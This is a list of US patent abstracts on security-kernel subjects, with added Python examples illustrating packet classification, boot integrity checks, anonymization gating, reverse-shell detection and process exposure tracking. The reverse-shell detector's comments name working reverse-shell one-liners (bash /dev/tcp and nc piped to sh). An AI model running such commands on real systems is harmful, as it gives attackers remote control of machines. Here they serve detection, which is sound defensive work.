Security Kernel Or Utility Patents (Class 713/164)
  • Patent number: 10776491
    Abstract: An apparatus and method for collecting an audit trail in a virtual machine boot process, the audit-trail-collecting apparatus including an event detection unit for detecting a software interrupt event, a register state information extraction unit for extracting state information of a CPU register corresponding to a detection time of the software interrupt event, a monitoring unit for monitoring a change in a vector value corresponding to the software interrupt event in an interrupt vector table, a threat occurrence detection unit for detecting a threat occurrence in a virtual machine boot process based on at least one of the CPU register state information and a monitored result, and an audit trail collection unit for storing an audit trail corresponding to at least one of the CPU register state information and the monitored result when the threat occurrence is detected in the virtual machine boot process.
    Type: Grant
    Filed: March 28, 2018
    Date of Patent: September 15, 2020
    Assignee: ELECTRONICS AND TELECOMMUNICATIONS RESEARCH INSTITUTE
    Inventors: Sung-Jin Kim, Hyunyi Yi, Seong-Joong Kim, Woomin Hwang, Byung-Joon Kim, Chulwoo Lee, Hyoung-Chun Kim
  • Patent number: 10778814
    Abstract: A system and method for classifying packets according to packet header field values. Each of a set of subkey tables is searched for a respective packet header field value; each such search results in a value for a subkey. The subkeys are combined to form a decision key. A decision table is then searched for the decision key. The search of the decision table results in an action code and a reason code, one or both of which may be used to determine how to further process the packet.
    Type: Grant
    Filed: January 24, 2018
    Date of Patent: September 15, 2020
    Assignee: Rockley Photonics Limited
    Inventors: Chiang Yeh, German Rodriguez Herrera, Bhaskar Chowdhuri
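The two-stage lookup in the Rockley abstract (per-field subkey tables, subkeys combined into a decision key, decision table returning an action code and a reason code) is the same shape as a first-match ACL, which is easiest to see in software. The block below is an added example written for this page, not code from the patent or from Rockley; the header fields, table contents, wildcard convention and action/reason vocabularies are constructed assumptions.

```python
"""Two-stage header classification: per-field subkey tables feed a decision
table that yields an action code and a reason code.

Added illustration, not the patent's code. The field set, the table
contents and the action/reason vocabularies are constructed.
"""
import ipaddress

# Stage 1: one subkey table per header field. IP-keyed tables are matched
# longest-prefix-first; the others are exact-match. Every table has a
# "default" subkey so a packet with an unknown value still gets a full key.
SUBKEY_TABLES = {
    "src_ip":   {"10.0.0.0/8": 1, "192.0.2.0/24": 2, "192.0.2.7/32": 3, "default": 0},
    "dst_port": {22: 1, 443: 2, 3389: 3, "default": 0},
    "proto":    {"tcp": 1, "udp": 2, "default": 0},
}
FIELD_ORDER = ("src_ip", "dst_port", "proto")

# Stage 2: the decision table, searched top-down on the combined key.
# None is a wildcard subkey. Actions FORWARD/DROP/MIRROR are constructed.
DECISION_TABLE = [
    ((3, None, None),    "DROP",    "blocked_host"),
    ((2, 1, 1),          "MIRROR",  "ssh_from_partner_net"),
    ((1, None, 1),       "FORWARD", "internal_tcp"),
    ((None, 2, 1),       "FORWARD", "https_any"),
    ((None, 3, None),    "DROP",    "rdp_not_allowed"),
    ((None, None, None), "DROP",    "default_deny"),
]


def lookup_subkey(field, value):
    """Search one subkey table for a header field value."""
    table = SUBKEY_TABLES[field]
    if value is None:
        return table["default"]
    if field.endswith("_ip"):
        addr = ipaddress.ip_address(value)
        best = None
        for key, subkey in table.items():
            if key == "default":
                continue
            net = ipaddress.ip_network(key)
            if addr in net and (best is None or net.prefixlen > best[0]):
                best = (net.prefixlen, subkey)
        return best[1] if best else table["default"]
    return table.get(value, table["default"])


def build_decision_key(packet):
    """Combine the per-field subkeys into the decision key (a tuple here;
    hardware would pack them into a fixed-width integer)."""
    return tuple(lookup_subkey(f, packet.get(f)) for f in FIELD_ORDER)


def classify(packet):
    """Return (decision_key, action_code, reason_code) for a parsed header."""
    key = build_decision_key(packet)
    for pattern, action, reason in DECISION_TABLE:
        if all(p is None or p == k for p, k in zip(pattern, key)):
            return key, action, reason
    raise RuntimeError("decision table lacks a catch-all entry")


if __name__ == "__main__":
    for pkt in (
        {"src_ip": "192.0.2.9", "dst_port": 22, "proto": "tcp"},
        {"src_ip": "203.0.113.5", "dst_port": 3389, "proto": "tcp"},
    ):
        print(pkt, "->", classify(pkt))
```

Two things worth checking in any implementation of this pattern: the decision table must end in a catch-all row (here `default_deny`), and the reason code should survive into logs, because it is the only thing that tells an analyst which row fired when two rows could have matched.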
  • Patent number: 10747875
    Abstract: Disclosed embodiments relate to secure and reliable customization of operating system kernels. Techniques include configuring a kernel security module for loading to an operating system kernel to run kernel-level scripts on the kernel, the kernel security module being configured to perform a security verification comprising operations of: identifying, at the kernel security module, a script received at the kernel security module for requested execution by the kernel, and verifying whether the script has a valid signature; determining, at the kernel security module and based on the security verification, whether to permit the script to be processed by the kernel; and identifying, based on the determining, executable code corresponding to the script to execute at the kernel.
    Type: Grant
    Filed: March 19, 2020
    Date of Patent: August 18, 2020
    Assignee: CyberArk Software Ltd.
    Inventor: Nimrod Stoler
  • Patent number: 10747905
    Abstract: In one example, a first enclave for use by a first counterparty to a smart contract is identified. A second enclave for use by a second counterparty to the smart contract may be identified. Secrets associated with the first counterparty to the first enclave may be caused to be securely provided. Secrets associated with the second counterparty to the second enclave may be caused to be securely provided. A cryptlet is caused to be provided to the first enclave. The cryptlet may be caused to be provided to the second enclave. A payload is received from the first enclave. A payload may be received from the second enclave. Validation may be caused to be performed for a plurality of payloads. The plurality of payloads may include the payload from the first enclave and the payload from the second enclave.
    Type: Grant
    Filed: June 23, 2017
    Date of Patent: August 18, 2020
    Assignee: Microsoft Technology Licensing, LLC
    Inventor: John Marley Gray
  • Patent number: 10742663
    Abstract: Systems and methods for providing security services during a power management mode are disclosed. In some embodiments, a method comprises detecting with a mobile security system a wake event on a mobile device, providing from the mobile security system a wake signal, the providing being in response to the wake event to wake the mobile device from a power management mode, and managing with the mobile security system security services of the mobile device. Managing security services may comprise scanning a hard drive of the mobile device for viruses and/or other malware. Managing security services may also comprise updating security applications or scanning the mobile device for unauthorized data.
    Type: Grant
    Filed: October 14, 2019
    Date of Patent: August 11, 2020
    Assignee: CUPP Computing AS
    Inventors: Ami Oz, Shlomo Touboul
  • Patent number: 10740488
    Abstract: A computer implemented method for data anonymization comprises: receiving a request for data that needs anonymization. The request comprises at least one field descriptor of data to be retrieved and a usage scenario of a user for the requested data. Then, based on the usage scenario, an anonymization algorithm to be applied to the data that is referred to by the field descriptor is determined. Subsequently, the determined anonymization algorithm is applied to the data that is referred to by the field descriptor. A test is performed as to whether the degree of anonymization fulfills a requirement related to the usage scenario. If the requirement is fulfilled, access to the anonymized data is provided.
    Type: Grant
    Filed: November 17, 2017
    Date of Patent: August 11, 2020
    Assignee: INTERNATIONAL BUSINESS MACHINES CORPORATION
    Inventors: Albert Maier, Martin Oberhofer, Yannick Saillet
  • Patent number: 10740125
    Abstract: An example system includes at least one memristive dot product engine (DPE) having at least one resource, the DPE further having a physical interface and a controller, the controller being communicatively coupled to the physical interface, the physical interface to communicate with the controller to access the DPE, and at least one replicated interface, each replicated interface being associated with a virtual DPE, the replicated interface being communicatively coupled to the controller. The controller is to allocate timeslots to the virtual DPE through the associated replicated interface to allow the virtual DPE access to the at least one resource.
    Type: Grant
    Filed: January 30, 2018
    Date of Patent: August 11, 2020
    Assignee: Hewlett Packard Enterprise Development LP
    Inventors: Geoffrey Ndu, Dejan Milojicic, Sai Rahul Chalamalasetti
  • Patent number: 10733284
    Abstract: A method and apparatus are provided for secure communication. The method includes binding an isolated environment, of a device, to a secure component. The secure component includes a secure application and data. The method also includes utilizing the isolated environment as an intermediary for communication of the data between the secure application and the device.
    Type: Grant
    Filed: October 6, 2016
    Date of Patent: August 4, 2020
    Assignee: Samsung Electronics Co., Ltd.
    Inventors: Antonios Dimitrios Broumas, Naman R. Patel
  • Patent number: 10733616
    Abstract: A computerized system and method may include, in response to receiving a blockchain via a communications network that includes information associated with an event, parsing, by a blockchain parsing engine being executed by a blockchain node, the information to identify a status state of an item related to the event. The blockchain, inclusive of the information, along with the status state of the item, may be stored in a storage unit. An event tracking engine may determine from the parsed information that the status state of the item transitioned from a first state to a second state. Responsive to the event tracking engine determining that a qualifying state is satisfied by the item being in the second state, the blockchain node automatically executes a smart code inclusive of initiating communications between a first party and a second party.
    Type: Grant
    Filed: October 20, 2017
    Date of Patent: August 4, 2020
    Assignee: Massachusetts Mutual Life Insurance Company
    Inventors: Jennifer Rutley, Abigail Jennings O'malley
  • Patent number: 10719606
    Abstract: Dynamic Trust Manager (DTM) having an interface coupled to an embedded system including an Application Processor (AP), boot media, and security processor. The security processor, at a start of a boot sequence of the AP, prevents the AP from proceeding with the boot sequence, verifies bootloader code stored in the boot media via boot media access, and if the bootloader code verification is successful, allows the AP to proceed using the verified bootloader code. The security processor may also be configured to activate an interrupt request of the AP during runtime, request the AP to execute a Security Monitor Driver (SMD) of the embedded system to measure an integrity information of code/data stored in an embedded system memory, receive from the SMD the measured integrity information of code/data, and verify whether the measured integrity information equals a reference integrity information stored in an integrity table of a DTM memory.
    Type: Grant
    Filed: February 23, 2018
    Date of Patent: July 21, 2020
    Assignee: Infineon Technologies AG
    Inventors: Oscar David Sanchez Diaz, Jurijus Cizas, Jeffrey Kelley, Mark Stafford
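The Infineon abstract describes two checks by an external security processor: gating the application processor's boot on a verified bootloader, and a runtime comparison of measurements returned by a Security Monitor Driver against an integrity table held in the DTM's own memory. The block below is an added example for this page, not Infineon's code; region names, image bytes and the integrity table are constructed, and SHA-256 is assumed as the measurement function.

```python
"""Boot gating and runtime integrity measurement by an external security
processor, in the style of the DTM described above.

Added illustration, not Infineon's code. Region names, image bytes and the
integrity table are constructed; SHA-256 stands in for the device's
measurement function.
"""
import hashlib
import hmac

# Constructed known-good images: what boot media and system memory hold
# when nothing has been tampered with.
GOOD_BOOT_MEDIA = {"bootloader": b"BOOTLOADER v1.2 (constructed image bytes)"}
GOOD_SYSTEM_MEMORY = {
    "kernel_text":  b"kernel .text section (constructed)",
    "driver_table": b"driver dispatch table (constructed)",
}


def measure(blob):
    return hashlib.sha256(blob).digest()


def build_integrity_table(boot_media, memory):
    """Reference digests kept in the DTM's own memory. Provisioned at
    manufacturing or secure-update time, never recomputed at boot."""
    table = {name: measure(img) for name, img in boot_media.items()}
    table.update({name: measure(img) for name, img in memory.items()})
    return table


class SecurityProcessor:
    """Stand-in for the DTM security processor: reads boot media directly,
    holds the AP until verification passes, and later asks the AP-resident
    Security Monitor Driver (SMD) for runtime measurements."""

    def __init__(self, integrity_table):
        self.integrity_table = integrity_table
        self.ap_released = False
        self.log = []

    def gate_boot(self, boot_media):
        """Start of the AP boot sequence: verify the bootloader before
        releasing the AP. Constant-time compare avoids a timing side channel."""
        measured = measure(boot_media.get("bootloader", b""))
        if hmac.compare_digest(measured, self.integrity_table["bootloader"]):
            self.ap_released = True
            self.log.append("bootloader verified; AP released")
        else:
            self.ap_released = False
            self.log.append("bootloader mismatch; AP held in reset")
        return self.ap_released

    def runtime_check(self, smd_measure):
        """Runtime path: raise an IRQ on the AP (modelled as calling the SMD
        callback) and compare each region's measurement with its reference.
        Returns the regions that fail."""
        failures = []
        for region, reference in self.integrity_table.items():
            if region == "bootloader":
                continue  # boot media is checked directly, not via the SMD
            if not hmac.compare_digest(smd_measure(region), reference):
                failures.append(region)
                self.log.append(f"integrity mismatch in {region}")
        return failures


def make_smd(memory):
    """Build an SMD callback that measures regions of the given memory image."""
    return lambda region: measure(memory[region])


if __name__ == "__main__":
    table = build_integrity_table(GOOD_BOOT_MEDIA, GOOD_SYSTEM_MEMORY)
    sp = SecurityProcessor(table)
    print("boot ok:", sp.gate_boot(GOOD_BOOT_MEDIA))
    print("runtime failures:", sp.runtime_check(make_smd(GOOD_SYSTEM_MEMORY)))
```

The runtime path trusts whatever the SMD reports, so its value rests on the boot-time gate, which the DTM performs with its own access to the boot media. Any design that relies on a measurement agent running on the host it measures needs that same anchor.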
  • Patent number: 10719627
    Abstract: A computer implemented method for data anonymization comprises: receiving a request for data that needs anonymization. The request comprises at least one field descriptor of data to be retrieved and a usage scenario of a user for the requested data. Then, based on the usage scenario, an anonymization algorithm to be applied to the data that is referred to by the field descriptor is determined. Subsequently, the determined anonymization algorithm is applied to the data that is referred to by the field descriptor. A test is performed as to whether the degree of anonymization fulfills a requirement related to the usage scenario. If the requirement is fulfilled, access to the anonymized data is provided.
    Type: Grant
    Filed: April 23, 2019
    Date of Patent: July 21, 2020
    Assignee: INTERNATIONAL BUSINESS MACHINES CORPORATION
    Inventors: Albert Maier, Martin Oberhofer, Yannick Saillet
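The two IBM abstracts above (10740488 and 10719627) describe one workflow: a request carries field descriptors and a usage scenario, the scenario selects an anonymization algorithm, the algorithm is applied, the degree of anonymization is tested against a scenario-specific requirement, and data is released only if the test passes. The block below is an added example for this page, not IBM's code. The records, the scenario policy and the generalization rules are constructed, and k-anonymity over the quasi-identifiers is assumed as the measure of "degree of anonymization".

```python
"""Usage-scenario-driven anonymization with a k-anonymity release gate.

Added illustration of the request -> algorithm -> apply -> test -> release
workflow. Records, policy and rules are constructed; k-anonymity is the
assumed anonymization measure.
"""
from collections import Counter

RECORDS = [  # constructed
    {"name": "Alice", "age": 34, "zip": "10001", "diagnosis": "flu"},
    {"name": "Bob",   "age": 37, "zip": "10002", "diagnosis": "asthma"},
    {"name": "Carol", "age": 52, "zip": "10001", "diagnosis": "flu"},
    {"name": "Dan",   "age": 58, "zip": "10004", "diagnosis": "migraine"},
    {"name": "Eve",   "age": 31, "zip": "10003", "diagnosis": "asthma"},
    {"name": "Frank", "age": 55, "zip": "10002", "diagnosis": "flu"},
]

DIRECT_IDENTIFIERS = {"name"}  # never released, whatever the scenario

# Generalization rules per quasi-identifier, keyed by algorithm name.
ALGORITHMS = {
    "coarse": {"age": lambda a: f"{a // 10 * 10}-{a // 10 * 10 + 9}",
               "zip": lambda z: z[:3] + "**"},
    "fine":   {"age": lambda a: f"{a // 5 * 5}-{a // 5 * 5 + 4}",
               "zip": lambda z: z[:4] + "*"},
}

# Usage scenario -> (algorithm, minimum k required before release).
SCENARIOS = {
    "aggregate_report": ("coarse", 3),
    "ml_training":      ("fine", 2),
}


def select_algorithm(usage_scenario):
    try:
        return SCENARIOS[usage_scenario]
    except KeyError:
        raise ValueError(f"no anonymization policy for scenario {usage_scenario!r}")


def anonymize(records, fields, algorithm):
    """Apply the algorithm's rule to each requested field; drop direct identifiers."""
    rules = ALGORITHMS[algorithm]
    rows = []
    for record in records:
        row = {}
        for f in fields:
            if f in DIRECT_IDENTIFIERS:
                continue
            row[f] = rules[f](record[f]) if f in rules else record[f]
        rows.append(row)
    return rows


def k_anonymity(rows, quasi_identifiers):
    """Size of the smallest equivalence class over the quasi-identifier columns."""
    if not rows:
        return 0
    if not quasi_identifiers:
        return len(rows)  # every row is in one class
    classes = Counter(tuple(row[q] for q in quasi_identifiers) for row in rows)
    return min(classes.values())


def handle_request(records, fields, usage_scenario):
    """The full workflow: select, apply, test, then release or refuse."""
    algorithm, min_k = select_algorithm(usage_scenario)
    rows = anonymize(records, fields, algorithm)
    qis = [f for f in fields if f in ALGORITHMS[algorithm]]
    k = k_anonymity(rows, qis)
    granted = k >= min_k
    return {"granted": granted, "k": k, "required_k": min_k,
            "algorithm": algorithm, "data": rows if granted else None}


if __name__ == "__main__":
    print(handle_request(RECORDS, ["age", "zip", "diagnosis"], "aggregate_report"))
    print(handle_request(RECORDS, ["age", "zip"], "ml_training"))
```

With these constructed records the coarse bands give k = 3 and the report is released, while the finer bands requested for training give k = 1 and the request is refused. k-anonymity only bounds re-identification through the quasi-identifiers; it says nothing about a sensitive column such as `diagnosis` being uniform inside a class, which a production test would also have to check.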
  • Patent number: 10719623
    Abstract: A system includes profile control circuitry that may receive a sovereign onboarding command. The sovereign onboarding command may be issued on behalf of a sovereign associated with a profile. The sovereign onboarding command may update a status value in the profile. The profile may be recorded on a data-tamper-protected distributed ledger. Arbitration circuitry may review the recorded profile status value and ensure that status values are enforced against the sovereign during exchanges.
    Type: Grant
    Filed: February 17, 2020
    Date of Patent: July 21, 2020
    Assignee: Accenture Global Solutions Limited
    Inventors: Patricia A. Miller, Scott W. Perkins, Shane R. Marshall, Peter Bidewell, Rodrigo Yukio Ieto
  • Patent number: 10708656
    Abstract: In some aspects, a mobile application package is bound to a privileged component of a mobile device operating system. The mobile application package includes a software virtualization layer and a management service component. The software virtualization layer and the management service component are enabled to execute in a privileged mode based on the privileged component. A virtual phone image is downloaded from a management server. A virtual machine based on the virtual phone image is launched by the software virtualization layer.
    Type: Grant
    Filed: July 25, 2018
    Date of Patent: July 7, 2020
    Assignee: VMWARE, INC.
    Inventors: Stephen Deasy, Craig Newell, Emil Sit, Paul Wisner, David Furodet, Viktor Gyuris, Robert Meyer, Fanny Strudel
  • Patent number: 10691445
    Abstract: Techniques for isolating a portion of an online computing service referred to as a deployment unit and configured with a complete build of the online computing service may include routing production traffic away from the deployment unit, applying one or more changes to the complete build, and after applying one or more changes to the complete build, using the deployment unit for testing these changes using end-to-end tests. In one embodiment, the deployment unit may be dedicated to a specific group of tenants that require at least some isolation from other tenants.
    Type: Grant
    Filed: June 27, 2018
    Date of Patent: June 23, 2020
    Assignee: Microsoft Technology Licensing, LLC
    Inventors: Nakul Garg, Ricardo Stern, Neelamadhaba Mahapatro, Rui Chen, Michael Wilde, Charles Jeffries
  • Patent number: 10691824
    Abstract: Securing an endpoint against exposure to unsafe content includes encrypting files to prevent unauthorized access, and monitoring an exposure state of a process to potentially unsafe content by applying behavioral rules to determine whether the exposure state is either exposed or secure, where (1) the process is initially identified as secure, (2) the process is identified as exposed when the process opens a network connection to a URL that is not internal to an enterprise network of the endpoint and that has a poor reputation, (3) the process is identified as exposed when it opens a file identified as exposed, and (4) the process is identified as exposed when another exposed process opens a handle to the process. Access to the files may be restricted when the process is exposed by controlling access through a file system filter that conditionally decrypts files for the process according to its exposure state.
    Type: Grant
    Filed: January 15, 2019
    Date of Patent: June 23, 2020
    Assignee: Sophos Limited
    Inventors: Kenneth D. Ray, Andrew J. Thomas, Anthony John Merry, Harald Schütz, Andreas Berger, John Edward Tyrone Shaw
  • Patent number: 10685117
    Abstract: A target file is run in an installation package. A secure dynamic library is loaded in the installation package. Based on a code in the target file, digital watermark information embedded in the target file and verification information stored in the secure dynamic library is retrieved. Based on the digital watermark information and the verification information, a determination is made whether the installation package is a repackaged installation package.
    Type: Grant
    Filed: April 11, 2019
    Date of Patent: June 16, 2020
    Assignee: Alibaba Group Holding Limited
    Inventors: Yaoguang Chen, Jiashui Wang
  • Patent number: 10673614
    Abstract: The present invention is provided with an encryption similarity calculation unit to calculate an encryption similarity being a similarity degree between storage data and search data encrypted using a homomorphic encryption, by performing a homomorphic operation on storage encryption data being the storage data encrypted using the homomorphic encryption, and search encryption data being the search data encrypted using the homomorphic encryption, the search data being used in search of the storage data, and an encryption result transmission unit to generate an encryption search result to represent whether or not the similarity degree is not more than a threshold value by using the encryption similarity, and to transmit the encryption search result to a search device.
    Type: Grant
    Filed: October 9, 2015
    Date of Patent: June 2, 2020
    Assignee: MITSUBISHI ELECTRIC CORPORATION
    Inventors: Takato Hirano, Yutaka Kawai
  • Patent number: 10664596
    Abstract: There is provided a system and a computer-implemented method of detecting malware in real time in a live environment. The method comprises: monitoring one or more operations of at least one program concurrently running in the live environment, building at least one stateful model in accordance with the one or more operations, analyzing the at least one stateful model to identify one or more behaviors, and determining the presence of malware based on the identified one or more behaviors.
    Type: Grant
    Filed: June 15, 2017
    Date of Patent: May 26, 2020
    Assignee: Sentinel Labs Israel Ltd.
    Inventors: Tomer Weingarten, Almog Cohen, Udi Shamir, Kirill Motil
  • Patent number: 10666677
    Abstract: An exemplary system, method, and computer-accessible medium for initiating a protocol(s) can be provided, which can include, for example, generating a digitally encrypted perishable object(s), distributing the digitally encrypted perishable object(s) to a cyber-physical entity(s), determining if the cyber-physical entity(s) has received the digitally encrypted perishable object(s), and initiating a predetermined protocol(s) based on the determination.
    Type: Grant
    Filed: September 23, 2015
    Date of Patent: May 26, 2020
    Assignees: New York University, Carnegie Mellon University
    Inventors: Will Casey, Bhubaneswar Mishra
  • Patent number: 10666618
    Abstract: When a computer system is compromised by a malicious user, detecting or preventing the malicious user can improve the security and efficiency of the computer system, as well as prevent data from being deleted or corrupted and/or stolen. An attacker who compromises a computer system is likely to take certain actions to exert control over the computer or avoid detection. When a compromised system is behind a network firewall, the attacker may seek to open a remote reverse shell on the compromised system to more easily issue commands, as the firewall may block direct attempts from outside the network to contact the compromised system. Detecting a reverse shell can be difficult, slow, and unreliable, however. The present disclosure discusses methods for detecting reverse shells based on analyzing redirection of data streams such as STDIN, STDOUT, and STDERR.
    Type: Grant
    Filed: September 15, 2016
    Date of Patent: May 26, 2020
    Assignee: PAYPAL, INC.
    Inventor: Shlomi Boutnaru
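The PayPal abstract frames reverse-shell detection around where a process's standard streams are redirected. On Linux that is visible in `/proc/<pid>/fd/0`, `1` and `2`, which for the common `bash -i >& /dev/tcp/host/port 0>&1` shape all resolve to the same `socket:[inode]`. The block below is an added example for this page, not PayPal's code; the scoring heuristic and the severity labels are assumptions, and the process snapshot is constructed to look like a `/proc` fd table.

```python
"""Reverse-shell detection from standard-stream redirection.

Added illustration of the idea above, not PayPal's code. The heuristic (a
shell whose fd 0/1/2 resolve to a socket, especially one socket) and the
severity labels are assumptions; the snapshot is constructed.
"""
import os
import re

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}

# Constructed snapshot: pid -> {"comm": process name, "fds": {fd: link target}}
SNAPSHOT = {
    1001: {"comm": "bash",    "fds": {0: "socket:[4711]", 1: "socket:[4711]", 2: "socket:[4711]"}},
    1002: {"comm": "bash",    "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    1003: {"comm": "nginx",   "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 6: "socket:[99]"}},
    1004: {"comm": "python3", "fds": {0: "socket:[5200]", 1: "socket:[5200]", 2: "socket:[5200]"}},
    1005: {"comm": "sh",      "fds": {0: "pipe:[77]", 1: "pipe:[78]", 2: "/dev/pts/1"}},
    1006: {"comm": "sshd",    "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[6000]"}},
    1007: {"comm": "sh",      "fds": {0: "socket:[6001]", 1: "socket:[6001]", 2: "/dev/null"}},
}


def stdio_sockets(fds):
    """Map each of fd 0/1/2 that points at a socket to that socket's inode."""
    found = {}
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fds.get(fd, ""))
        if m:
            found[fd] = int(m.group(1))
    return found


def classify_process(pid, info):
    """Return a finding dict, or None if the process looks normal."""
    socks = stdio_sockets(info["fds"])
    if not socks:
        return None
    one_socket = len(set(socks.values())) == 1
    is_shell = info["comm"] in SHELLS
    if is_shell and len(socks) >= 2 and one_socket:
        severity = "high"    # classic `bash -i >& /dev/tcp/... 0>&1` shape
    elif is_shell:
        severity = "medium"  # a shell with some of its stdio on a socket
    elif len(socks) == 3 and one_socket:
        severity = "medium"  # interpreter with dup2'd stdio, often about to exec a shell
    else:
        return None
    return {"pid": pid, "comm": info["comm"], "severity": severity, "stdio": socks}


def scan(snapshot):
    findings = []
    for pid, info in snapshot.items():
        finding = classify_process(pid, info)
        if finding:
            findings.append(finding)
    return findings


def read_live_snapshot():
    """Linux only: build the same structure from /proc. Reading other users'
    fd tables normally needs root; unreadable processes are skipped."""
    snapshot = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"/proc/{entry}/fd/{fd}")
            except OSError:
                pass
        snapshot[int(entry)] = {"comm": comm, "fds": fds}
    return snapshot


if __name__ == "__main__":
    for finding in scan(SNAPSHOT):
        print(finding)
```

Process 1005 in the snapshot is the known blind spot: a `mkfifo`-style shell (`nc host port < /tmp/f | sh > /tmp/f`) routes stdio through pipes, so a detector also has to follow each pipe inode to its peer process before it can see the socket. Network daemons with sockets only on high fds (1003, 1006) are not flagged, which is the point of looking at fds 0 to 2 rather than at "has a socket".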
  • Patent number: 10657277
    Abstract: Securing an endpoint against exposure to unsafe content includes encrypting files to prevent unauthorized access, and monitoring an exposure state of a process to potentially unsafe content by applying behavioral rules to determine whether the exposure state is either exposed or secure, where (1) the process is initially identified as secure, (2) the process is identified as exposed when the process opens a network connection to a URL that is not internal to an enterprise network of the endpoint and that has a poor reputation, (3) the process is identified as exposed when it opens a file identified as exposed, and (4) the process is identified as exposed when another exposed process opens a handle to the process. Access to the files may be restricted when the process is exposed by controlling access through a file system filter that conditionally decrypts files for the process according to its exposure state.
    Type: Grant
    Filed: November 20, 2017
    Date of Patent: May 19, 2020
    Assignee: Sophos Limited
    Inventors: Kenneth D. Ray, Andrew J. Thomas, Anthony John Merry, Harald Schütz, Andreas Berger, John Edward Tyrone Shaw
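The two Sophos abstracts above (10691824 and 10657277) give an explicit four-rule state machine for process exposure plus a file-system filter that decrypts only for secure processes. The block below runs those rules over a constructed event log. It is an added example for this page, not Sophos code; the internal-domain list, the reputation feed, the events and one extra rule (a file written by an exposed process becomes an exposed file, since the abstracts say files can be "identified as exposed" without saying how) are assumptions.

```python
"""Process exposure-state tracking with a gating file-system filter, after
the rule set in the two abstracts above.

Added illustration, not Sophos code. Domain list, reputation feed, events
and the taint-on-write rule for files are assumptions.
"""
from urllib.parse import urlparse

INTERNAL_DOMAINS = ("corp.example",)                     # constructed
POOR_REPUTATION = {"evil.example", "dl.badcdn.example"}  # constructed feed


def is_internal(host):
    # Exact or subdomain match; a bare endswith() would accept "notcorp.example".
    return any(host == d or host.endswith("." + d) for d in INTERNAL_DOMAINS)


class ExposureTracker:
    def __init__(self):
        self.process_state = {}   # pid -> "secure" | "exposed"
        self.exposed_files = set()
        self.audit = []           # (pid, reason) in the order exposure happened

    def state(self, pid):
        return self.process_state.get(pid, "secure")   # rule 1: initially secure

    def _expose(self, pid, reason):
        if self.state(pid) != "exposed":
            self.process_state[pid] = "exposed"
            self.audit.append((pid, reason))

    def on_event(self, ev):
        pid, kind = ev["pid"], ev["type"]
        if kind == "net_connect":                          # rule 2
            host = (urlparse(ev["url"]).hostname or "").lower()
            if not is_internal(host) and host in POOR_REPUTATION:
                self._expose(pid, f"connected to poor-reputation host {host}")
        elif kind == "file_open":                          # rule 3
            path = ev["path"]
            if path in self.exposed_files:
                self._expose(pid, f"opened exposed file {path}")
            if ev.get("write") and self.state(pid) == "exposed":
                self.exposed_files.add(path)               # assumption: taint on write
        elif kind == "open_handle":                        # rule 4
            if self.state(pid) == "exposed":
                self._expose(ev["target_pid"], f"handle opened by exposed pid {pid}")

    def filter_allows_decrypt(self, pid, path):
        """File-system filter decision: decrypt protected files only for secure processes."""
        return self.state(pid) == "secure"


EVENTS = [  # constructed
    {"type": "net_connect", "pid": 100, "url": "https://intranet.corp.example/doc/1"},
    {"type": "net_connect", "pid": 100, "url": "https://evil.example/payload"},
    {"type": "file_open", "pid": 100, "path": r"C:\Users\a\Downloads\payload.docm", "write": True},
    {"type": "file_open", "pid": 200, "path": r"C:\Users\a\Downloads\payload.docm"},
    {"type": "open_handle", "pid": 200, "target_pid": 300},
    {"type": "file_open", "pid": 400, "path": r"C:\Finance\secret.xlsx"},
]


def run(events):
    tracker = ExposureTracker()
    for ev in events:
        tracker.on_event(ev)
    return tracker


if __name__ == "__main__":
    t = run(EVENTS)
    for pid in (100, 200, 300, 400):
        print(pid, t.state(pid), "decrypt:", t.filter_allows_decrypt(pid, r"C:\Finance\secret.xlsx"))
    print(t.audit)
```

Exposure here is sticky for the life of the process, which is what the rules as stated imply; the abstracts do not describe how a process returns to secure, so nothing is modelled for that. The order of checks inside `file_open` matters: test the file against the exposed set before deciding whether this write taints it, otherwise a process can taint and then "open" the same file in one event without changing state.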
  • Patent number: 10649964
    Abstract: Various examples are directed to systems and methods for managing a database to include data from an external data source. A database engine may receive a request to add a reference column to a database described by a database schema. The request may comprise a location parameter describing a location of the external data source comprising data for populating the reference column and a data identifying parameter describing data at the external data source for populating the reference column. The database engine may modify the database schema to include the reference column, send a query to the external data source to obtain at least one data item for populating the reference column, and populate the reference column with the at least one data item.
    Type: Grant
    Filed: February 26, 2015
    Date of Patent: May 12, 2020
    Assignee: Red Hat, Inc.
    Inventors: Filip Nguyen, Filip Elias
  • Patent number: 10614252
    Abstract: A distributed file integrity checking system is described. The described peer integrity checking system (PICS) may negate an attack by storing a properties database amongst nodes of a peer-to-peer network of hosts, some or all of which co-operate to protect and watch over each other.
    Type: Grant
    Filed: August 31, 2017
    Date of Patent: April 7, 2020
    Assignee: ARCHITECTURE TECHNOLOGY CORPORATION
    Inventors: Barry A. Trent, Edward R. Mandy
  • Patent number: 10594670
    Abstract: Systems and methods are disclosed for encrypting portions of data for storage and processing in a remote network. For example, methods may include receiving a message that includes data for forwarding to a server device; encrypting a portion of the data to determine an encrypted portion; determining metadata based on the portion of the data, wherein the metadata indicates one or more properties of the portion of the data and enables one or more operations to be performed by the server device that depend on the one or more properties; determining a payload including the data with both the encrypted portion and the metadata substituted for the portion of the data; and transmitting the payload to the server device.
    Type: Grant
    Filed: May 30, 2017
    Date of Patent: March 17, 2020
    Assignee: ServiceNow, Inc.
    Inventors: Pierre Francois Rohel, Siddharth Shah, Martin Wexler
  • Patent number: 10594668
    Abstract: In one embodiment, a crypto cloudlet is provided that includes a security wrapper to a virtual machine to guarantee secure Input/Output exchange between a client and one or more cryptographic adaptive services powered by a set of virtual CPUs through a single well defined channel, an adaptive service running in the virtual machine that identifies hardware resources necessary to satisfy a cryptographic demand or request, and an Ethernet interface communicatively coupled to the security wrapper providing network channel services for exchange of cryptographic data and commands. The security wrapper presents to the adaptive services the hardware accelerators exposed by the virtual machine. Other embodiments are disclosed.
    Type: Grant
    Filed: February 10, 2017
    Date of Patent: March 17, 2020
